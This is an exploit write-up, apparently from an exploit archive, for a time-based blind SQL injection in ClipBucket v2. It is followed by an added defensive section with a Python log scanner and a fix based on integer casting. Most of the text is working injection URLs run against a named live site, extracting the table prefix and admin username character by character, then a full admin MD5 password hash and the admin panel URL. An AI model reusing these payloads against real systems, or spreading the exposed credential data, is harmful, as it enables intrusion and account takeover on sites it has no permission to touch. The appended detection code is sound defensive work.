===============================================================================
Vulnerable Software: ClipBucket v2
Official Site: http://clip-bucket.com/
================================================================================
Exploited: In Wild.
================================================================================
Vuln Desc:

ClipBucket v2 is prone to a blind SQL injection vulnerability. It seems to be a fairly old version, and I am a bit lazy to "fingerprint" which build is vulnerable. Anyway, at least the page source will "say" so.

If you want to fingerprint whether a target site is vulnerable, simply use this (if you get a "delay", it is a vulnerable version):

site.tld/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(1=1,sleep(50),0))--

There is also another way to fingerprint it. On vulnerable versions you will find menus like these (especially the Help menu section on the index page):

© ClipBucket v2 2012
Home
Contact Us
About us
Privacy Policy
Terms of Serivce
Help

Real exploitation example:

radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(length(table_name)=char(0x31),sleep(50),0) from information_schema.tables where TABLE_schema !=0x696E666F726D6174696F6E5F736368656D61 limit 1)--

Here the table name is 13 characters long:

http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(length(table_name)=char(0x3133),sleep(50),0) from information_schema.tables where TABLE_schema !=0x696E666F726D6174696F6E5F736368656D61 limit 1)--

We need to learn the table prefix:

http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(substr(table_name1,1)=char(0x30),sleep(50),0) from information_schema.tables where TABLE_schema !=0x696E666F726D6174696F6E5F736368656D61 limit 1)--
THIS GIVES TRUE.

//TRUE
http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(substr(0x616263,1,1)=char(0x61),sleep(54),0))--
//TRUE

1st character of the table: c
=========================
http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(substr(table_name,1,1)=char(99),sleep(54),0) from information_schema.tables where TABLE_schema !=0x696E666F726D6174696F6E5F736368656D61 limit 1)--

2nd character: b
3rd character: _
http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(substr(table_name,3,1)=char(95),sleep(54),0) from information_schema.tables where TABLE_schema !=0x696E666F726D6174696F6E5F736368656D61 limit 1)--

table prefix: cb_

Checking the user id:
//TRUE
http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(userid=char(49),sleep(54),0) from cb_users limit 1)--
ID=1

UNAME: admin
http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(username=char(97,100,109,105,110),sleep(54),0) from cb_users limit 1)--
http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(username=char(97,100,109,105,110),sleep(54),0) from cb_users where userid=1)--

How to extract the password:
http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(substr(password,1,1)=char(97),sleep(54),0) from cb_users where userid=1)--

PASS:
=======================================================
1st character: 3
http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(substr(password,1,1)=char(51),sleep(54),0) from cb_users where userid=1)--
OR:
http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(substr(password,1,1)=0x33,sleep(54),0) from cb_users where userid=1)--
RTIME: 56250 ms
=======================================================
2nd character: 5
http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(substr(password,2,1)=0x34,sleep(54),0) from cb_users where userid=1)--
RTIME: 55578 ms
=======================================================
3rd character: c
http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(substr(password,3,1)=0x43,sleep(54),0) from cb_users where userid=1)--
RTIME: 55579 ms
=======================================================
4th character: 3
http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(substr(password,4,1)=0x33,sleep(54),0) from cb_users where userid=1)--
RTIME: 55656 ms
=======================================================
5th character: a
http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(substr(password,5,1)=0x41,sleep(54),0) from cb_users where userid=1)--
RTIME: 56234 ms
=======================================================
6th character: 6
http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(substr(password,6,1)=0x36,sleep(54),0) from cb_users where userid=1)--
RTIME: 69672 ms
=======================================================
7th character: a (verify later)
http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(substr(password,7,1)=0x41,sleep(54),0) from cb_users where userid=1)--
RTIME: 17266 ms
=======================================================
8th character: 6
http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(substr(password,8,1)=0x36,sleep(54),0) from cb_users where userid=1)--
RTIME: 56141 ms
=======================================================
9th character: 6
http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(substr(password,9,1)=0x36,sleep(54),0) from cb_users where userid=1)--
RTIME: 56125 ms
=======================================================
10th character: 2
http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(substr(password,10,1)=0x32,sleep(54),0) from cb_users where userid=1)--
RTIME: 56157 ms
=======================================================
11th character: 3
http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(substr(password,11,1)=0x33,sleep(54),0) from cb_users where userid=1)--
RTIME: 55937 ms
=======================================================
12th character: b
http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(substr(password,12,1)=0x42,sleep(54),0) from cb_users where userid=1)--
RTIME: 56234 ms
=======================================================
13th character: 6
http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(substr(password,13,1)=0x36,sleep(54),0) from cb_users where userid=1)--
RTIME: 56219 ms
========================================================
14th character: 9
http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(substr(password,14,1)=0x39,sleep(54),0) from cb_users where userid=1)--
RTIME: 56297 ms
========================================================
15th character: 5
http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(substr(password,15,1)=0x35,sleep(54),0) from cb_users where userid=1)--
RTIME: 55641 ms
=========================================================
16th character: f
http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(substr(password,16,1)=0x46,sleep(54),0) from cb_users where userid=1)--
RTIME: 56828 ms
=========================================================
17th character: 7
http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(substr(password,17,1)=0x37,sleep(54),0) from cb_users where userid=1)--
RTIME: 56296 ms
=========================================================
18th character: 5 (verify later)
http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(substr(password,18,1)=0x35,sleep(54),0) from cb_users where userid=1)--
RTIME: 55469 ms
==========================================================
19th character: 6
http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(substr(password,19,1)=0x36,sleep(54),0) from cb_users where userid=1)--
RTIME: 56390 ms
=========================================================
20th character: b
http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(substr(password,20,1)=0x42,sleep(54),0) from cb_users where userid=1)--
RTIME: 56375 ms
========================================================
21st character: d (verify later)
http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(substr(password,21,1)=0x44,sleep(54),0) from cb_users where userid=1)--
RTIME: 55796 ms
=======================================================
22nd character: d (verify later)
http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(substr(password,22,1)=0x44,sleep(54),0) from cb_users where userid=1)--
RTIME: 56406 ms
=======================================================
23rd character: f
http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(substr(password,23,1)=0x46,sleep(54),0) from cb_users where userid=1)--
RTIME: 55563 ms
========================================================
24th character: 0 (verify later)
http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(substr(password,24,1)=0x30,sleep(54),0) from cb_users where userid=1)--
RTIME: 56172 ms
========================================================
25th character: 4
http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(substr(password,25,1)=0x34,sleep(54),0) from cb_users where userid=1)--
RTIME: 56078 ms
========================================================
26th character: 9
http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(substr(password,26,1)=0x39,sleep(54),0) from cb_users where userid=1)--
RTIME: 55594 ms
========================================================
27th character: 6
http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(substr(password,27,1)=0x36,sleep(54),0) from cb_users where userid=1)--
RTIME: 56094 ms
========================================================
28th character: 7
http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(substr(password,28,1)=0x37,sleep(54),0) from cb_users where userid=1)--
RTIME: 56109 ms
========================================================
29th character: c
http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(substr(password,29,1)=0x43,sleep(54),0) from cb_users where userid=1)--
RTIME: 55563 ms
========================================================
30th character: d
http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(substr(password,30,1)=0x44,sleep(54),0) from cb_users where userid=1)--
RTIME: 55625 ms
========================================================
31st character: 5
http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(substr(password,31,1)=0x35,sleep(54),0) from cb_users where userid=1)--
RTIME: 56188 ms
=========================================================
32nd character: 7
http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(substr(password,32,1)=0x37,sleep(54),0) from cb_users where userid=1)--
RTIME: 55625 ms
=========================================================

So we got:
uname: admin
MD5 HASH: 35c3a6a6623b695f756bddf04967cd57
Admin Panel: http://radio5.5.am/admin_area/

//TRUE
Verifying whether the obtained hash is valid. In this case it again gives a "delay", which is the hint for us: the obtained hash is valid.
http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(substr(password,1,33)=0x3335633361366136363233623639356637353662646466303439363763643537,sleep(54),0) from cb_users where userid=1)--

[ ]Done[ ]

+++++++++My Special thanks to:+++++++++++++++++++++
packetstormsecurity.org
packetstormsecurity.com
packetstormsecurity.net
securityfocus.com
cxsecurity.com
security.nnov.ru
securtiyvulns.com
securitylab.ru
1337day.com
secunia.com
securityhome.eu
exploitsdownload.com
exploit-db.com
to all AA Team + to all Azerbaijan Black HatZ
*Especially to my bro CAMOUFL4G3.*
++++++++++++++++++++++++++++++++++++++++++++++++
Respect && Thank you.
/AkaStep ^_^
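From the defender's side, the two things this advisory relies on are also what make the attack easy to spot in web server logs: a `collection` parameter that should be a bare integer but carries SQL, and response times that jump to the requested sleep() duration. The following is an added example, not part of the advisory or of ClipBucket: it scans constructed Apache-style access log lines (request duration in ms appended as the last field, as a %D-style directive would log it) for exactly those two signals; the log lines, client addresses, threshold and marker list are all constructed for this example.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample log: combined format plus request duration in ms as the last field.
# The payloads are the ones shown in the advisory; the client addresses are placeholders.
SAMPLE_LOG = """\
203.0.113.5 - - [01/Jan/2013:10:00:01 +0000] "GET /view_item.php?item=BK1198YX9AX1&type=photos&collection=12 HTTP/1.1" 200 5120 120
203.0.113.5 - - [01/Jan/2013:10:00:05 +0000] "GET /view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999%20or%20(select%20if(1=1,sleep(50),0))-- HTTP/1.1" 200 5120 50210
203.0.113.5 - - [01/Jan/2013:10:01:10 +0000] "GET /view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999%20or%20(select%20if(substr(password,1,1)=0x33,sleep(54),0)%20from%20cb_users%20where%20userid=1)-- HTTP/1.1" 200 5120 56250
198.51.100.7 - - [01/Jan/2013:10:02:00 +0000] "GET /view_item.php?item=ABC&type=photos&collection=7 HTTP/1.1" 200 4801 98
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d+) (?P<bytes>\S+) (?P<ms>\d+)$'
)
# SQL fragments that have no business in an integer id; all occur in the advisory's payloads.
SQL_MARKERS = ("sleep(", "benchmark(", "information_schema", "select ", " or ", "--")
SLOW_MS = 10_000  # a page that normally answers in ~100 ms taking this long suggests sleep() fired


def inspect_request(target, duration_ms):
    """Return the reasons a view_item.php request looks like time-based blind SQLi (empty if none)."""
    parts = urlsplit(target)
    if parts.path != "/view_item.php":
        return []
    reasons = []
    # parse_qs percent-decodes the value and splits name/value on the first '=' only,
    # so '=' inside the injected SQL does not break the parse.
    collection = parse_qs(parts.query, keep_blank_values=True).get("collection", [""])[0]
    if not collection.isdigit():  # the application only ever needs an integer here
        reasons.append("collection is not an integer")
        hits = [m for m in SQL_MARKERS if m in collection.lower()]
        if hits:
            reasons.append("SQL fragments: " + ", ".join(hits))
    if duration_ms >= SLOW_MS:
        reasons.append("slow response (%d ms)" % duration_ms)
    return reasons


def scan_log(text):
    """Yield (client ip, reasons) for every log line that trips at least one check."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if m:
            reasons = inspect_request(m["target"], int(m["ms"]))
            if reasons:
                findings.append((m["ip"], reasons))
    return findings
```

The fix in the application itself is the mirror image of the first check: cast `collection` to an integer (or bind it as a parameter in a prepared statement) before it reaches the query, so a non-numeric value never becomes SQL.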